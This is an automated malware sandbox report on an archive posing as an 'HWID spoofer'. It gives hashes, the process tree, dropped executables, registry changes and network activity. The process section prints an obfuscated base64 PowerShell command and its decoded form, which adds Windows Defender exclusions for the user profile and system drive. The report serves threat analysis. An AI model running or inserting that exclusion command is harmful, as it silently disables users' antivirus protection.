File name: Sync HWID Spoоfer.rar

Full analysis: https://app.any.run/tasks/db59721f-6593-42c1-8673-7ebb1f24fb32
Verdict: Malicious activity
Analysis date: December 02, 2023, 07:31:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5: 62540EA8B1974C5C8136CA5B18C6EAA5
SHA1: 12922E62EFB38E668B940A308CFF2D9305ECE410
SHA256: 1C32C4D5B682E1392CE4ADFF0AD36BC845824AFA9D241DB7E29A048482BDF8F9
SSDEEP: 98304:IgQOvP/DHlpBAcJZ9Vt76ryxYq5JTZrP5GoyyflLdEtQWdCY+E0NiSSWVAwcFkx5:ODuvrrzOOqNR+H

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • sync_spoofer.exe (PID: 2076)
      • sp_componentbrowserFontDriverPerf.exe (PID: 2964)
  • SUSPICIOUS

    • Base64-obfuscated command line is found

      • sync_spoofer.exe (PID: 2076)
    • Reads the Internet Settings

      • sync_spoofer.exe (PID: 2076)
    • Starts POWERSHELL.EXE for commands execution

      • sync_spoofer.exe (PID: 2076)
    • BASE64 encoded PowerShell command has been detected

      • sync_spoofer.exe (PID: 2076)
    • Powershell version downgrade attack

      • powershell.exe (PID: 2132)
  • INFO

    • Checks supported languages

      • sync_spoofer.exe (PID: 2076)
      • sp_componentbrowserFontDriverPerf.exe (PID: 2964)
    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 844)
    • Reads the computer name

      • sync_spoofer.exe (PID: 2076)
      • sp_componentbrowserFontDriverPerf.exe (PID: 2964)
    • Creates files or folders in the user directory

      • sync_spoofer.exe (PID: 2076)
    • Reads the machine GUID from the registry

      • sp_componentbrowserFontDriverPerf.exe (PID: 2964)
    • Reads Environment values

      • sp_componentbrowserFontDriverPerf.exe (PID: 2964)
    • Reads product name

      • sp_componentbrowserFontDriverPerf.exe (PID: 2964)
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
All screenshots are available in the full report
Total processes: 46
Monitored processes: 5
Malicious processes: 3
Suspicious processes: 1

Behavior graph

Process tree (nodes as shown in the graph; parent links taken from the process information below):

start
  winrar.exe (PID 844, no specs)
    sync_spoofer.exe (PID 3872, no specs)
    sync_spoofer.exe (PID 2076)
      powershell.exe (PID 2132, no specs)
      sp_componentbrowserfontdriverperf.exe (PID 2964)

Process information

Fields per process: PID, CMD, Path, Indicators, Parent process
PID: 844
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Sync HWID Spoоfer.rar"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Exit code: 0
Version: 5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
PID: 2076
CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXb844.30939\sync_spoofer.exe"
Path: C:\Users\admin\AppData\Local\Temp\Rar$EXb844.30939\sync_spoofer.exe
Parent process: WinRAR.exe
User: admin
Integrity Level: HIGH
Exit code: 0
Version: 1,2,0,0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exb844.30939\sync_spoofer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
PID: 2132
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAcwBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAcQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbgBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAdwByACMAPgA="
Decoded -EncodedCommand (base64 of UTF-16LE text; the <#...#> fragments are PowerShell block comments inserted as filler): <#jsf#>Add-MpPreference <#qqv#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#qnp#> -Force <#swr#>
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: sync_spoofer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 2964
CMD: "C:\Users\admin\AppData\Roaming\sp_componentbrowserFontDriverPerf.exe"
Path: C:\Users\admin\AppData\Roaming\sp_componentbrowserFontDriverPerf.exe
Parent process: sync_spoofer.exe
User: admin
Integrity Level: HIGH
Exit code: 3221225477 (0xC0000005, STATUS_ACCESS_VIOLATION)
Version: 16.10.31418.88
Modules
Images
c:\users\admin\appdata\roaming\sp_componentbrowserfontdriverperf.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID: 3872
CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXb844.30939\sync_spoofer.exe"
Path: C:\Users\admin\AppData\Local\Temp\Rar$EXb844.30939\sync_spoofer.exe
Parent process: WinRAR.exe
User: admin
Integrity Level: MEDIUM
Exit code: 3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED)
Version: 1,2,0,0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exb844.30939\sync_spoofer.exe
c:\windows\system32\ntdll.dll
Total events: 3 959
Read events: 3 856
Write events: 103
Delete events: 0

Modification events

Process: (844) WinRAR.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\17F\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

Process: (844) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 2
Value: C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip

Process: (844) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip

Process: (844) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\Desktop\phacker.zip

Process: (844) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

Process: (844) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

Process: (844) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120

Process: (844) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value: 100

Process: (844) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

Process: (844) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1
Executable files: 5
Suspicious files: 3
Text files: 1
Unknown types: 0

Dropped files

Fields per dropped file: PID, Process, Filename, Type, MD5, SHA256

PID: 2964
Process: sp_componentbrowserFontDriverPerf.exe
Filename: C:\Users\admin\Desktop\vgarXBgo.log
Type:
MD5:
SHA256:

PID: 2132
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AMV649SBVKPV0BJNW1SW.temp
Type: binary
MD5: 16F6D260068B85896C0EBB2E1B2A60D1
SHA256: 6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984

PID: 2076
Process: sync_spoofer.exe
Filename: C:\Users\admin\AppData\Roaming\conhost_sft.exe
Type: executable
MD5: 673B523777D7F575004E47668BCEDFD2
SHA256: B255FD532CB851BE74F4D72CA572E34916D218138ABDAF9CD5C41298F3AEE903

PID: 2132
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 16F6D260068B85896C0EBB2E1B2A60D1
SHA256: 6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984

PID: 844
Process: WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXb844.30939\ChangeLog.txt
Type: text
MD5: 5957F5923B5636CAC6B3D45D703FF51A
SHA256: ED088715797968F5F58EE9986EAD700CE546815BB0ACE6631D434936E1723758

PID: 2076
Process: sync_spoofer.exe
Filename: C:\Users\admin\AppData\Roaming\HpsrSpoof.exe
Type: executable
MD5: DD1313842898FFAF72D79DF643637DED
SHA256: 81B27A565D2EB4701C404E03398A4BCA48480E592460121BF8EC62C5F4B061DF

PID: 2076
Process: sync_spoofer.exe
Filename: C:\Users\admin\AppData\Roaming\sp_componentbrowserFontDriverPerf.exe
Type: executable
MD5: D18283D6CFE1D4FD930F8B80EF786E86
SHA256: 6D3FB4F323E7A18336F671001A885433418658E9AC244C6E9D8FB961340836B3

PID: 2132
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20809e.TMP
Type: binary
MD5: 16F6D260068B85896C0EBB2E1B2A60D1
SHA256: 6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984

PID: 844
Process: WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXb844.30939\sync_spoofer.exe
Type: executable
MD5: 7A09738F8033D766E8B03463389F0E20
SHA256: F5A8ADBB37CE76781117AAD88C8C4C9E2B8D7BDD3C3378AFDB7DC37C66134B59

PID: 2964
Process: sp_componentbrowserFontDriverPerf.exe
Filename: C:\Users\admin\Desktop\lFquSIBM.log
Type: executable
MD5: D8BF2A0481C0A17A634D066A711C12E9
SHA256: 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 4
DNS requests: 0
Threats: 0

HTTP requests

No HTTP requests

Connections

Fields per connection: PID, Process, IP, Domain, ASN, CN, Reputation (no Domain, ASN or CN values appear for these entries)

PID: 4
Process: System
IP: 192.168.100.255:137
Reputation: whitelisted

PID: 4
Process: System
IP: 192.168.100.255:138
Reputation: whitelisted

PID: 1080
Process: svchost.exe
IP: 224.0.0.252:5355
Reputation: unknown

PID: 2588
Process: svchost.exe
IP: 239.255.255.250:1900
Reputation: whitelisted

DNS requests

No data

Threats

No threats detected
No debug info